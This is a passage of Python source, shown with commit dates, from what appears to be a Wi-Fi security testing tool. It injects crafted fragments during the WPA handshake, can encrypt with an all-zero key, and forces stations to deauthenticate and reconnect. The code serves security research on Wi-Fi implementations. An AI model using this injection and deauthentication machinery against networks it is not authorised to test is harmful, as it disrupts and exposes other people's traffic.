|
|
|
|
# Forward request only makes sense towards the DS/AP
|
|
|
|
assert (not forward) or ((p.FCfield & 1) == 0)
|
2020-03-10 09:43:46 -04:00
|
|
|
# Priority is only supported in data frames
|
|
|
|
assert (prior == None) or (p.type == 2)
|
2020-03-07 21:10:26 -05:00
|
|
|
|
2020-04-19 08:20:40 -04:00
|
|
|
# Set the appropriate to-DS or from-DS bits
|
2020-03-07 21:10:26 -05:00
|
|
|
p.FCfield |= self.FCfield
|
2020-04-19 08:20:40 -04:00
|
|
|
|
|
|
|
# Add the QoS header if requested
|
2020-03-25 09:53:38 -04:00
|
|
|
if prior != None:
|
2020-03-10 09:43:46 -04:00
|
|
|
p.subtype = 8
|
2020-04-01 10:14:07 -04:00
|
|
|
if not Dot11QoS in p:
|
|
|
|
p.add_payload(Dot11QoS(TID=prior))
|
|
|
|
else:
|
|
|
|
p[Dot11QoS].TID = prior
|
2020-03-10 09:43:46 -04:00
|
|
|
|
2020-04-19 08:20:40 -04:00
|
|
|
# This checks if the to-DS is set (frame towards the AP)
|
|
|
|
if p.FCfield & 1 != 0:
|
|
|
|
p.addr1 = self.bss
|
|
|
|
p.addr2 = self.mac
|
|
|
|
p.addr3 = self.get_peermac() if not forward else self.othermac
|
|
|
|
else:
|
|
|
|
p.addr1 = self.peermac
|
|
|
|
p.addr2 = self.mac
|
|
|
|
p.addr3 = self.bss
|
2020-03-04 06:36:52 -05:00
|
|
|
|
2020-03-27 15:19:31 -04:00
|
|
|
def get_header(self, seqnum=None, prior=2, **kwargs):
|
2020-03-25 09:53:38 -04:00
|
|
|
"""
|
|
|
|
Generate a default common header. By default use priority of 1 so destination
|
|
|
|
will still accept lower Packet Numbers on other priorities.
|
|
|
|
"""
|
2020-03-27 14:22:12 -04:00
|
|
|
|
|
|
|
if seqnum == None:
|
|
|
|
seqnum = self.seqnum
|
|
|
|
self.seqnum += 1
|
|
|
|
|
2020-03-24 08:52:31 -04:00
|
|
|
header = Dot11(type="Data", SC=(seqnum << 4))
|
2020-03-25 09:53:38 -04:00
|
|
|
self.set_header(header, prior=prior, **kwargs)
|
2020-03-24 08:52:31 -04:00
|
|
|
return header
|
2020-02-29 15:56:41 -05:00
|
|
|
|
2020-04-19 20:15:44 -04:00
|
|
|
def encrypt(self, frame, inc_pn=1, force_key=None):
|
2020-04-23 21:15:15 -04:00
|
|
|
# TODO: Option to use per-QoS transmit replay counters?
|
2020-03-28 13:33:34 -04:00
|
|
|
self.pn += inc_pn
|
2020-04-23 21:15:15 -04:00
|
|
|
|
2020-03-13 06:49:58 -04:00
|
|
|
key, keyid = (self.tk, 0) if int(frame.addr1[1], 16) & 1 == 0 else (self.gtk, self.gtk_idx)
|
2020-04-19 20:15:44 -04:00
|
|
|
if force_key == 0:
|
|
|
|
log(STATUS, "Encrypting with all-zero key")
|
|
|
|
key = b"\x00" * len(key)
|
2020-04-22 19:14:35 -04:00
|
|
|
|
|
|
|
if len(key) == 16:
|
|
|
|
encrypted = encrypt_ccmp(frame, key, self.pn, keyid)
|
|
|
|
else:
|
|
|
|
encrypted = encrypt_wep(frame, key, self.pn, keyid)
|
|
|
|
|
2020-03-13 06:49:58 -04:00
|
|
|
return encrypted
|
|
|
|
|
2020-04-19 08:20:40 -04:00
|
|
|
def handle_connecting(self, bss):
|
|
|
|
log(STATUS, f"Station: setting BSS MAC address {bss}")
|
|
|
|
self.bss = bss
|
2020-03-13 06:49:58 -04:00
|
|
|
|
2020-03-27 12:58:11 -04:00
|
|
|
# Clear the keys on a new connection
|
|
|
|
self.reset_keys()
|
2020-04-19 08:20:40 -04:00
|
|
|
|
|
|
|
def set_peermac(self, peermac):
|
|
|
|
self.peermac = peermac
|
|
|
|
|
|
|
|
def get_peermac(self):
|
|
|
|
# When being a client, the peermac may not yet be known. In that
|
|
|
|
# case we assume it's the same as the BSS (= AP) MAC address.
|
|
|
|
if self.peermac == None:
|
|
|
|
return self.bss
|
|
|
|
return self.peermac
|
2020-03-29 18:11:35 -04:00
|
|
|
|
2020-04-25 09:25:58 -04:00
|
|
|
# TODO: Show a warning when unusual transitions are detected?
|
2020-03-25 09:53:38 -04:00
|
|
|
def trigger_eapol_events(self, eapol):
|
2020-04-22 19:14:35 -04:00
|
|
|
# Ignore EAP authentication handshakes
|
|
|
|
if EAP in eapol: return None
|
|
|
|
|
|
|
|
# Track return value of possible trigger Action function
|
2020-04-19 20:15:44 -04:00
|
|
|
result = None
|
|
|
|
|
2020-03-13 06:49:58 -04:00
|
|
|
key_type = eapol.key_info & 0x0008
|
|
|
|
key_ack = eapol.key_info & 0x0080
|
|
|
|
key_mic = eapol.key_info & 0x0100
|
|
|
|
key_secure = eapol.key_info & 0x0200
|
|
|
|
# Detect Msg3/4 assumig WPA2 is used --- XXX support WPA1 as well
|
|
|
|
is_msg3_or_4 = key_secure != 0
|
|
|
|
|
|
|
|
# Inject any fragments before authenticating
|
|
|
|
if not self.txed_before_auth:
|
2020-04-15 10:27:22 -04:00
|
|
|
log(STATUS, "Action.StartAuth", color="green")
|
2020-04-19 20:15:44 -04:00
|
|
|
result = self.perform_actions(Action.StartAuth, eapol=eapol)
|
2020-03-13 06:49:58 -04:00
|
|
|
self.txed_before_auth = True
|
2020-03-27 15:19:31 -04:00
|
|
|
self.txed_before_auth_done = False
|
|
|
|
|
2020-03-13 06:49:58 -04:00
|
|
|
# Inject any fragments when almost done authenticating
|
|
|
|
elif is_msg3_or_4 and not self.txed_before_auth_done:
|
2020-04-15 10:27:22 -04:00
|
|
|
log(STATUS, "Action.BeforeAuth", color="green")
|
2020-04-19 20:15:44 -04:00
|
|
|
result = self.perform_actions(Action.BeforeAuth, eapol=eapol)
|
2020-03-13 06:49:58 -04:00
|
|
|
self.txed_before_auth_done = True
|
2020-03-27 15:19:31 -04:00
|
|
|
self.txed_before_auth = False
|
2020-03-13 06:49:58 -04:00
|
|
|
|
2020-03-29 18:11:35 -04:00
|
|
|
self.time_connected = None
|
2020-04-19 20:15:44 -04:00
|
|
|
return result
|
2020-03-29 18:11:35 -04:00
|
|
|
|
2020-03-25 09:53:38 -04:00
|
|
|
def handle_eapol_tx(self, eapol):
|
|
|
|
eapol = EAPOL(eapol)
|
2020-04-19 20:15:44 -04:00
|
|
|
send_it = self.trigger_eapol_events(eapol)
|
|
|
|
|
|
|
|
if send_it == None:
|
|
|
|
# - Send over monitor interface to assure order compared to injected fragments.
|
|
|
|
# - This is also important because the station might have already installed the
|
|
|
|
# key before this script can send the EAPOL frame over Ethernet (but we didn't
|
|
|
|
# yet request the key from this script).
|
|
|
|
# - Send with high priority, otherwise Action.AfterAuth might be send before
|
|
|
|
# the EAPOL frame by the Wi-Fi chip.
|
|
|
|
self.send_mon(eapol)
|
|
|
|
|
|
|
|
def perform_actions(self, trigger, **kwargs):
|
|
|
|
result = None
|
2020-03-30 13:53:56 -04:00
|
|
|
if self.test == None:
|
|
|
|
return
|
|
|
|
|
2020-04-15 10:27:22 -04:00
|
|
|
frame = None
|
|
|
|
while self.test.next_trigger_is(trigger):
|
|
|
|
act = self.test.next_action(self)
|
|
|
|
|
2020-04-19 20:15:44 -04:00
|
|
|
# TODO: Previously scheduled Connected on AfterAuth should be cancelled??
|
2020-04-15 10:27:22 -04:00
|
|
|
if act.action == Action.GetIp and not self.obtained_ip:
|
2020-04-19 08:58:35 -04:00
|
|
|
self.waiting_on_ip = True
|
2020-03-29 18:11:35 -04:00
|
|
|
self.daemon.get_ip(self)
|
2020-04-15 10:27:22 -04:00
|
|
|
break
|
|
|
|
|
2020-04-19 08:58:35 -04:00
|
|
|
elif act.action == Action.Func:
|
2020-04-19 20:15:44 -04:00
|
|
|
result = act.func(self, **kwargs)
|
|
|
|
log(STATUS, "[Executed Function] Result=" + str(result))
|
|
|
|
# TODO: How to collect multiple results on one trigger?
|
2020-04-15 10:27:22 -04:00
|
|
|
|
|
|
|
elif act.action == Action.Rekey:
|
|
|
|
# Force rekey as AP, wait on rekey as client
|
|
|
|
self.daemon.rekey(self)
|
2020-04-22 19:14:35 -04:00
|
|
|
|
2020-04-15 10:27:22 -04:00
|
|
|
elif act.action == Action.Roam:
|
|
|
|
# Roam as client, TODO XXX what was AP?
|
|
|
|
self.daemon.roam(self)
|
|
|
|
|
|
|
|
elif act.action == Action.Reconnect:
|
|
|
|
# Full reconnect as AP, reassociation as client
|
|
|
|
self.daemon.reconnect(self)
|
|
|
|
|
|
|
|
elif act.action == Action.Inject:
|
2020-04-23 10:19:14 -04:00
|
|
|
if act.delay != None and act.delay > 0:
|
2020-04-15 10:27:22 -04:00
|
|
|
log(STATUS, f"Sleeping {act.delay} seconds")
|
|
|
|
time.sleep(act.delay)
|
|
|
|
|
|
|
|
if act.encrypted:
|
|
|
|
assert self.tk != None and self.gtk != None
|
2020-04-23 21:15:15 -04:00
|
|
|
log(STATUS, "Encrypting with key " + self.tk.hex() + " " + repr(act.frame))
|
2020-04-19 20:15:44 -04:00
|
|
|
frame = self.encrypt(act.frame, inc_pn=act.inc_pn, force_key=act.key)
|
2020-04-15 10:27:22 -04:00
|
|
|
else:
|
|
|
|
frame = act.frame
|
|
|
|
|
|
|
|
self.daemon.inject_mon(frame)
|
|
|
|
log(STATUS, "[Injected fragment] " + repr(frame))
|
2020-03-29 18:11:35 -04:00
|
|
|
|
2020-04-22 19:14:35 -04:00
|
|
|
# Stop processing actions if requested
|
|
|
|
if act.wait: break
|
|
|
|
|
2020-04-15 10:27:22 -04:00
|
|
|
# With ath9k_htc devices, there's a bug when injecting a frame with the
|
|
|
|
# More Fragments (MF) field *and* operating the interface in AP mode
|
|
|
|
# while the target is connected. For some reason, after injecting the
|
|
|
|
# frame, it halts the transmission of all other normal frames (this even
|
|
|
|
# includes beacons). Injecting a dummy packet like below avoid this,
|
|
|
|
# and assures packets keep being sent normally (when the last fragment
|
|
|
|
# had the MF flag set).
|
|
|
|
#
|
|
|
|
# Note: when the device is only operating in monitor mode, this does
|
|
|
|
# not seem to be a problem.
|
|
|
|
#
|
|
|
|
if self.options.inject_workaround and frame != None and frame.FCfield & 0x4 != 0:
|
|
|
|
self.daemon.inject_mon(Dot11(addr1="ff:ff:ff:ff:ff:ff"))
|
2020-04-23 10:19:14 -04:00
|
|
|
log(STATUS, "[Injected packet] Prevented ath9k_htc bug after fragment injection")
|
2020-03-29 18:11:35 -04:00
|
|
|
|
2020-04-19 20:15:44 -04:00
|
|
|
return result
|
|
|
|
|
2020-04-20 19:25:54 -04:00
|
|
|
def update_keys(self):
|
|
|
|
log(STATUS, "Requesting keys from wpa_supplicant")
|
2020-03-24 08:52:31 -04:00
|
|
|
self.tk = self.daemon.get_tk(self)
|
|
|
|
self.gtk, self.gtk_idx = self.daemon.get_gtk()
|
2020-03-25 09:53:38 -04:00
|
|
|
|
2020-04-20 19:25:54 -04:00
|
|
|
def handle_authenticated(self):
|
|
|
|
"""Called after completion of the 4-way handshake or similar"""
|
|
|
|
self.update_keys()
|
|
|
|
|
2020-04-15 10:27:22 -04:00
|
|
|
# Note that self.time_connect may get changed in perform_actions
|
|
|
|
log(STATUS, "Action.AfterAuth", color="green")
|
2020-03-27 13:23:49 -04:00
|
|
|
self.time_connected = time.time() + 1
|
2020-04-15 10:27:22 -04:00
|
|
|
self.perform_actions(Action.AfterAuth)
|
2020-03-27 15:19:31 -04:00
|
|
|
|
2020-03-27 13:23:49 -04:00
|
|
|
def handle_connected(self):
|
|
|
|
"""This is called ~1 second after completing the handshake"""
|
2020-04-15 10:27:22 -04:00
|
|
|
log(STATUS, "Action.Connected", color="green")
|
|
|
|
self.perform_actions(Action.Connected)
|
2020-03-27 14:22:12 -04:00
|
|
|
|
2020-03-25 09:53:38 -04:00
|
|
|
def set_ip_addresses(self, ip, peerip):
|
2020-03-07 21:10:26 -05:00
|
|
|
self.ip = ip
|
|
|
|
self.peerip = peerip
|
2020-03-24 08:52:31 -04:00
|
|
|
self.obtained_ip = True
|
2020-03-07 21:10:26 -05:00
|
|
|
|
2020-04-25 09:25:58 -04:00
|
|
|
log(DEBUG, "Waiting on IP before forming next actions: " + str(self.waiting_on_ip))
|
2020-04-19 08:58:35 -04:00
|
|
|
if self.waiting_on_ip:
|
|
|
|
self.waiting_on_ip = False
|
|
|
|
self.perform_actions(Action.Connected)
|
|
|
|
|
2020-03-27 13:23:49 -04:00
|
|
|
def time_tick(self):
|
2020-03-29 18:11:35 -04:00
|
|
|
if self.time_connected != None and time.time() > self.time_connected:
|
2020-03-27 13:23:49 -04:00
|
|
|
self.time_connected = None
|
2020-03-29 18:11:35 -04:00
|
|
|
self.handle_connected()
|
2020-03-27 13:23:49 -04:00
|
|
|
|
2020-03-30 13:13:21 -04:00
|
|
|
# ----------------------------------- Client and AP Daemons -----------------------------------
|
|
|
|
|
2020-03-29 18:11:35 -04:00
|
|
|
class Daemon(metaclass=abc.ABCMeta):
|
2020-03-07 21:10:26 -05:00
|
|
|
def __init__(self, options):
|
|
|
|
self.options = options
|
|
|
|
|
|
|
|
# Note: some kernels don't support interface names of 15+ characters
|
|
|
|
self.nic_iface = options.interface
|
|
|
|
self.nic_mon = "mon" + self.nic_iface[:12]
|
|
|
|
|
|
|
|
self.process = None
|
|
|
|
self.sock_eth = None
|
|
|
|
self.sock_mon = None
|
|
|
|
|
|
|
|
@abc.abstractmethod
|
|
|
|
def start_daemon(self):
|
|
|
|
pass
|
|
|
|
|
|
|
|
def configure_daemon(self):
|
|
|
|
pass
|
|
|
|
|
2020-03-25 09:53:38 -04:00
|
|
|
def handle_mon(self, p):
|
2020-03-07 21:10:26 -05:00
|
|
|
pass
|
|
|
|
|
2020-03-25 09:53:38 -04:00
|
|
|
def handle_eth(self, p):
|
2020-03-07 21:10:26 -05:00
|
|
|
pass
|
|
|
|
|
2020-03-27 13:23:49 -04:00
|
|
|
@abc.abstractmethod
|
|
|
|
def time_tick(self, station):
|
|
|
|
pass
|
|
|
|
|
2020-03-07 21:10:26 -05:00
|
|
|
@abc.abstractmethod
|
|
|
|
def get_tk(self, station):
|
|
|
|
pass
|
2020-02-29 15:56:41 -05:00
|
|
|
|
2020-03-13 06:49:58 -04:00
|
|
|
def get_gtk(self):
|
|
|
|
gtk, idx = wpaspy_command(self.wpaspy_ctrl, "GET_GTK").split()
|
|
|
|
return bytes.fromhex(gtk), int(idx)
|
|
|
|
|
2020-03-29 18:11:35 -04:00
|
|
|
@abc.abstractmethod
|
|
|
|
def get_ip(self, station):
|
|
|
|
pass
|
|
|
|
|
2020-03-27 14:22:12 -04:00
|
|
|
@abc.abstractmethod
|
|
|
|
def rekey(self, station):
|
|
|
|
pass
|
|
|
|
|
2020-03-29 18:11:35 -04:00
|
|
|
@abc.abstractmethod
|
|
|
|
def reconnect(self, station):
|
|
|
|
pass
|
|
|
|
|
2020-03-04 06:36:52 -05:00
|
|
|
# TODO: Might be good to put this into libwifi?
|
2020-02-27 07:07:19 -05:00
|
|
|
def configure_interfaces(self):
|
|
|
|
log(STATUS, "Note: disable Wi-Fi in your network manager so it doesn't interfere with this script")
|
|
|
|
|
|
|
|
# 0. Some users may forget this otherwise
|
|
|
|
subprocess.check_output(["rfkill", "unblock", "wifi"])
|
|
|
|
|
2020-03-27 12:50:28 -04:00
|
|
|
# 1. Only create a new monitor interface if it does not yet exist
|
|
|
|
try:
|
|
|
|
scapy.arch.get_if_index(self.nic_mon)
|
|
|
|
except IOError:
|
|
|
|
subprocess.call(["iw", self.nic_mon, "del"], stdout=subprocess.PIPE, stdin=subprocess.PIPE)
|
|
|
|
subprocess.check_output(["iw", self.nic_iface, "interface", "add", self.nic_mon, "type", "monitor"])
|
2020-02-27 07:07:19 -05:00
|
|
|
|
|
|
|
# 2. Configure monitor mode on interfaces
|
|
|
|
# Some kernels (Debian jessie - 3.16.0-4-amd64) don't properly add the monitor interface. The following ugly
|
|
|
|
# sequence of commands assures the virtual interface is properly registered as a 802.11 monitor interface.
|
|
|
|
subprocess.check_output(["iw", self.nic_mon, "set", "type", "monitor"])
|
|
|
|
time.sleep(0.5)
|
|
|
|
subprocess.check_output(["iw", self.nic_mon, "set", "type", "monitor"])
|
|
|
|
subprocess.check_output(["ifconfig", self.nic_mon, "up"])
|
|
|
|
|
2020-03-27 12:49:33 -04:00
|
|
|
# 3. Remember whether to need to perform a workaround.
|
|
|
|
driver = get_device_driver(self.nic_iface)
|
|
|
|
if driver == None:
|
|
|
|
log(WARNING, "Unable to detect driver of interface!")
|
|
|
|
log(WARNING, "Injecting fragments may contains bugs.")
|
|
|
|
elif driver == "ath9k_htc":
|
|
|
|
options.inject_workaround = True
|
|
|
|
log(STATUS, "Detect ath9k_htc, using injection bug workarounds")
|
|
|
|
|
2020-03-07 21:10:26 -05:00
|
|
|
def inject_mon(self, p):
|
|
|
|
self.sock_mon.send(p)
|
|
|
|
|
|
|
|
def inject_eth(self, p):
|
|
|
|
self.sock_eth.send(p)
|
|
|
|
|
2020-03-04 06:36:52 -05:00
|
|
|
def run(self):
|
2020-02-27 07:07:19 -05:00
|
|
|
self.configure_interfaces()
|
2020-03-04 06:36:52 -05:00
|
|
|
self.start_daemon()
|
2020-03-07 21:10:26 -05:00
|
|
|
self.sock_mon = MonitorSocket(type=ETH_P_ALL, iface=self.nic_mon)
|
|
|
|
self.sock_eth = L2Socket(type=ETH_P_ALL, iface=self.nic_iface)
|
|
|
|
|
2020-03-04 06:36:52 -05:00
|
|
|
# Open the wpa_supplicant or hostapd control interface
|
2020-02-27 07:07:19 -05:00
|
|
|
try:
|
2020-03-07 21:10:26 -05:00
|
|
|
self.wpaspy_ctrl = Ctrl("wpaspy_ctrl/" + self.nic_iface)
|
|
|
|
self.wpaspy_ctrl.attach()
|
2020-02-27 07:07:19 -05:00
|
|
|
except:
|
2020-03-04 06:36:52 -05:00
|
|
|
log(ERROR, "It seems wpa_supplicant/hostapd did not start properly, please inspect its output.")
|
|
|
|
log(ERROR, "Did you disable Wi-Fi in the network manager? Otherwise it won't start properly.")
|
2020-02-27 07:07:19 -05:00
|
|
|
raise
|
|
|
|
|
2020-03-24 08:52:31 -04:00
|
|
|
# Post-startup configuration of the supplicant or AP
|
2020-03-07 21:10:26 -05:00
|
|
|
self.configure_daemon()
|
2020-03-01 19:03:08 -05:00
|
|
|
|
2020-02-27 07:07:19 -05:00
|
|
|
# Monitor the virtual monitor interface of the client and perform the needed actions
|
|
|
|
while True:
|
2020-03-27 13:23:49 -04:00
|
|
|
sel = select.select([self.sock_mon, self.sock_eth, self.wpaspy_ctrl.s], [], [], 0.5)
|
2020-03-07 21:10:26 -05:00
|
|
|
if self.sock_mon in sel[0]:
|
|
|
|
p = self.sock_mon.recv()
|
2020-03-25 09:53:38 -04:00
|
|
|
if p != None: self.handle_mon(p)
|
2020-03-04 06:36:52 -05:00
|
|
|
|
2020-03-07 21:10:26 -05:00
|
|
|
if self.sock_eth in sel[0]:
|
|
|
|
p = self.sock_eth.recv()
|
2020-03-25 09:53:38 -04:00
|
|
|
if p != None and Ether in p: self.handle_eth(p)
|
2020-03-04 06:36:52 -05:00
|
|
|
|
2020-03-07 21:10:26 -05:00
|
|
|
if self.wpaspy_ctrl.s in sel[0]:
|
|
|
|
msg = self.wpaspy_ctrl.recv()
|
2020-03-04 06:36:52 -05:00
|
|
|
self.handle_wpaspy(msg)
|
2020-02-27 07:07:19 -05:00
|
|
|
|
2020-03-27 13:23:49 -04:00
|
|
|
self.time_tick()
|
|
|
|
|
2020-02-27 07:07:19 -05:00
|
|
|
def stop(self):
|
2020-03-04 06:36:52 -05:00
|
|
|
log(STATUS, "Closing Hostap daemon and cleaning up ...")
|
2020-03-07 21:10:26 -05:00
|
|
|
if self.process:
|
|
|
|
self.process.terminate()
|
|
|
|
self.process.wait()
|
|
|
|
if self.sock_eth: self.sock_eth.close()
|
|
|
|
if self.sock_mon: self.sock_mon.close()
|
|
|
|
|
|
|
|
|
|
|
|
class Authenticator(Daemon):
|
|
|
|
def __init__(self, options):
|
|
|
|
super().__init__(options)
|
|
|
|
|
|
|
|
self.apmac = None
|
|
|
|
self.sock_eth = None
|
|
|
|
self.dhcp = None
|
|
|
|
self.arp_sender_ip = None
|
|
|
|
self.arp_sock = None
|
|
|
|
self.stations = dict()
|
|
|
|
|
|
|
|
def get_tk(self, station):
|
2020-04-19 08:20:40 -04:00
|
|
|
tk = wpaspy_command(self.wpaspy_ctrl, "GET_TK " + station.get_peermac())
|
2020-03-13 06:49:58 -04:00
|
|
|
return bytes.fromhex(tk)
|
2020-03-07 21:10:26 -05:00
|
|
|
|
2020-03-27 13:23:49 -04:00
|
|
|
def time_tick(self):
|
2020-03-27 14:22:12 -04:00
|
|
|
for station in self.stations.values():
|
2020-03-27 13:23:49 -04:00
|
|
|
station.time_tick()
|
|
|
|
|
2020-03-29 10:56:59 -04:00
|
|
|
def get_ip(self, station):
|
2020-04-19 08:20:40 -04:00
|
|
|
log(STATUS, f"Waiting on client {station.get_peermac()} to get IP")
|
2020-03-29 10:56:59 -04:00
|
|
|
|
2020-03-27 14:22:12 -04:00
|
|
|
def rekey(self, station):
|
2020-04-23 10:19:14 -04:00
|
|
|
log(STATUS, f"Starting PTK rekey with client {station.get_peermac()}", color="green")
|
2020-04-19 08:20:40 -04:00
|
|
|
wpaspy_command(self.wpaspy_ctrl, "REKEY_PTK " + station.get_peermac())
|
2020-03-27 14:22:12 -04:00
|
|
|
|
2020-03-29 10:56:59 -04:00
|
|
|
def reconnect(self, station):
|
2020-03-25 09:53:38 -04:00
|
|
|
# Confirmed to *instantly* reconnect: Arch Linux, Windows 10 with Intel WiFi chip, iPad Pro 13.3.1
|
|
|
|
# Reconnects only after a few seconds: MacOS (same with other reasons and with deauthentication)
|
2020-04-25 09:25:58 -04:00
|
|
|
# Takes a few seconds, and then does a full new connection: Security Camera
|
|
|
|
if self.options.full_reconnect:
|
|
|
|
log(STATUS, "Deauthentication station to make it reconnect")
|
|
|
|
cmd = f"DEAUTHENTICATE {station.get_peermac()} reason={WLAN_REASON_CLASS2_FRAME_FROM_NONAUTH_STA}"
|
|
|
|
else:
|
|
|
|
log(STATUS, "Disassociating station to make it reconnect")
|
|
|
|
cmd = f"DISASSOCIATE {station.get_peermac()} reason={WLAN_REASON_CLASS3_FRAME_FROM_NONASSOC_STA}"
|
2020-03-25 09:53:38 -04:00
|
|
|
wpaspy_command(self.wpaspy_ctrl, cmd)
|
|
|
|
|
|
|
|
def handle_eth_dhcp(self, p, station):
|
2020-04-19 08:20:40 -04:00
|
|
|
if not DHCP in p or not station.get_peermac() in self.dhcp.leases: return
|
2020-03-25 09:53:38 -04:00
|
|
|
|
|
|
|
# This assures we only mark it was connected after receiving a DHCP Request
|
|
|
|
req_type = next(opt[1] for opt in p[DHCP].options if isinstance(opt, tuple) and opt[0] == 'message-type')
|
|
|
|
if req_type != 3: return
|
|
|
|
|
2020-04-19 08:20:40 -04:00
|
|
|
peerip = self.dhcp.leases[station.get_peermac()]
|
|
|
|
log(STATUS, f"Client {station.get_peermac()} with IP {peerip} has connected")
|
2020-03-25 09:53:38 -04:00
|
|
|
station.set_ip_addresses(self.arp_sender_ip, peerip)
|
|
|
|
|
|
|
|
def handle_eth(self, p):
|
2020-03-07 21:10:26 -05:00
|
|
|
# Ignore clients not connected to the AP
|
|
|
|
clientmac = p[Ether].src
|
|
|
|
if not clientmac in self.stations:
|
|
|
|
return
|
|
|
|
|
|
|
|
# Let clients get IP addresses
|
|
|
|
self.dhcp.reply(p)
|
|
|
|
self.arp_sock.reply(p)
|
|
|
|
|
2020-03-25 09:53:38 -04:00
|
|
|
# Monitor DHCP messages to know when a client received an IP address
|
2020-03-07 21:10:26 -05:00
|
|
|
station = self.stations[clientmac]
|
2020-03-25 09:53:38 -04:00
|
|
|
if not station.obtained_ip:
|
|
|
|
self.handle_eth_dhcp(p, station)
|
|
|
|
else:
|
|
|
|
station.handle_eth(p)
|
2020-03-07 21:10:26 -05:00
|
|
|
|
2020-04-23 11:50:21 -04:00
|
|
|
def add_station(self, clientmac):
|
|
|
|
if not clientmac in self.stations:
|
|
|
|
station = Station(self, self.apmac, "from-DS")
|
|
|
|
self.stations[clientmac] = station
|
|
|
|
|
|
|
|
if self.options.ip and self.options.peerip:
|
|
|
|
# XXX should we also override our own IP? Won't match with DHCP router.
|
|
|
|
self.dhcp.prealloc_ip(clientmac, self.options.peerip)
|
|
|
|
station.set_ip_addresses(self.options.ip, self.options.peerip)
|
|
|
|
|
2020-03-07 21:10:26 -05:00
|
|
|
def handle_wpaspy(self, msg):
|
2020-03-13 06:49:58 -04:00
|
|
|
if "AP-STA-CONNECTING" in msg:
|
|
|
|
cmd, clientmac = msg.split()
|
2020-04-23 11:50:21 -04:00
|
|
|
self.add_station(clientmac)
|
2020-03-07 21:10:26 -05:00
|
|
|
|
2020-03-29 10:56:59 -04:00
|
|
|
log(STATUS, f"Client {clientmac} is connecting")
|
2020-03-07 21:10:26 -05:00
|
|
|
station = self.stations[clientmac]
|
2020-04-19 08:20:40 -04:00
|
|
|
station.handle_connecting(self.apmac)
|
|
|
|
station.set_peermac(clientmac)
|
2020-03-07 21:10:26 -05:00
|
|
|
|
2020-03-13 06:49:58 -04:00
|
|
|
elif "EAPOL-TX" in msg:
|
|
|
|
cmd, clientmac, payload = msg.split()
|
|
|
|
if not clientmac in self.stations:
|
2020-03-29 10:56:59 -04:00
|
|
|
log(WARNING, f"Sending EAPOL to unknown client {clientmac}.")
|
2020-03-13 06:49:58 -04:00
|
|
|
return
|
|
|
|
self.stations[clientmac].handle_eapol_tx(bytes.fromhex(payload))
|
|
|
|
|
2020-04-23 10:19:14 -04:00
|
|
|
# XXX WPA1: Take into account group key handshake on initial 4-way HS
|
2020-03-13 06:49:58 -04:00
|
|
|
elif "AP-STA-CONNECTED" in msg:
|
|
|
|
cmd, clientmac = msg.split()
|
|
|
|
if not clientmac in self.stations:
|
2020-03-29 10:56:59 -04:00
|
|
|
log(WARNING, f"Unknown client {clientmac} finished authenticating.")
|
2020-03-13 06:49:58 -04:00
|
|
|
return
|
|
|
|
self.stations[clientmac].handle_authenticated()
|
|
|
|
|
2020-03-07 21:10:26 -05:00
|
|
|
def start_daemon(self):
|
|
|
|
log(STATUS, "Starting hostapd ...")
|
|
|
|
try:
|
|
|
|
self.process = subprocess.Popen([
|
|
|
|
"../hostapd/hostapd",
|
|
|
|
"-i", self.nic_iface,
|
2020-04-23 10:19:14 -04:00
|
|
|
"hostapd.conf"] + log_level2switch())
|
2020-03-07 21:10:26 -05:00
|
|
|
time.sleep(1)
|
|
|
|
except:
|
|
|
|
if not os.path.exists("../hostapd/hostapd"):
|
|
|
|
log(ERROR, "hostapd executable not found. Did you compile hostapd?")
|
|
|
|
raise
|
2020-02-27 07:07:19 -05:00
|
|
|
|
2020-03-07 21:10:26 -05:00
|
|
|
self.apmac = scapy.arch.get_if_hwaddr(self.nic_iface)
|
2020-02-27 07:07:19 -05:00
|
|
|
|
2020-03-07 21:10:26 -05:00
|
|
|
def configure_daemon(self):
|
2020-03-28 13:33:34 -04:00
|
|
|
# Intercept EAPOL packets that the AP wants to send
|
2020-03-24 08:52:31 -04:00
|
|
|
wpaspy_command(self.wpaspy_ctrl, "SET ext_eapol_frame_io 1")
|
|
|
|
|
2020-03-07 21:10:26 -05:00
|
|
|
# Let scapy handle DHCP requests
|
|
|
|
self.dhcp = DHCP_sock(sock=self.sock_eth,
|
|
|
|
domain='mathyvanhoef.com',
|
|
|
|
pool=Net('192.168.100.0/24'),
|
|
|
|
network='192.168.100.0/24',
|
|
|
|
gw='192.168.100.254',
|
|
|
|
renewal_time=600, lease_time=3600)
|
|
|
|
# Configure gateway IP: reply to ARP and ping requests
|
|
|
|
subprocess.check_output(["ifconfig", self.nic_iface, "192.168.100.254"])
|
2020-03-01 19:03:08 -05:00
|
|
|
|
2020-03-07 21:10:26 -05:00
|
|
|
# Use a dedicated IP address for our ARP ping and replies
|
|
|
|
self.arp_sender_ip = self.dhcp.pool.pop()
|
|
|
|
self.arp_sock = ARP_sock(sock=self.sock_eth, IP_addr=self.arp_sender_ip, ARP_addr=self.apmac)
|
2020-03-29 10:56:59 -04:00
|
|
|
log(STATUS, f"Will inject ARP packets using sender IP {self.arp_sender_ip}")
|
2020-03-04 06:36:52 -05:00
|
|
|
|
|
|
|
|
2020-03-07 21:10:26 -05:00
|
|
|
class Supplicant(Daemon):
|
2020-03-04 06:36:52 -05:00
|
|
|
def __init__(self, options):
|
|
|
|
super().__init__(options)
|
2020-03-07 21:10:26 -05:00
|
|
|
self.station = None
|
2020-03-24 08:52:31 -04:00
|
|
|
self.arp_sock = None
|
2020-03-29 18:11:35 -04:00
|
|
|
self.dhcp_xid = None
|
2020-04-19 08:58:35 -04:00
|
|
|
self.dhcp_offer_frame = False
|
|
|
|
self.time_retrans_dhcp = None
|
2020-03-04 06:36:52 -05:00
|
|
|
|
2020-03-07 21:10:26 -05:00
|
|
|
def get_tk(self, station):
|
|
|
|
tk = wpaspy_command(self.wpaspy_ctrl, "GET tk")
|
|
|
|
if tk == "none":
|
2020-03-13 06:49:58 -04:00
|
|
|
raise Exception("Couldn't retrieve session key of client")
|
2020-03-07 21:10:26 -05:00
|
|
|
else:
|
|
|
|
return bytes.fromhex(tk)
|
|
|
|
|
2020-03-29 18:11:35 -04:00
|
|
|
def get_ip(self, station):
|
2020-04-19 08:58:35 -04:00
|
|
|
if not self.dhcp_offer_frame:
|
|
|
|
self.send_dhcp_discover()
|
|
|
|
else:
|
|
|
|
self.send_dhcp_request(self.dhcp_offer_frame)
|
|
|
|
|
2020-04-19 20:15:44 -04:00
|
|
|
self.time_retrans_dhcp = time.time() + 2.5
|
2020-03-29 18:11:35 -04:00
|
|
|
|
2020-03-27 14:22:12 -04:00
|
|
|
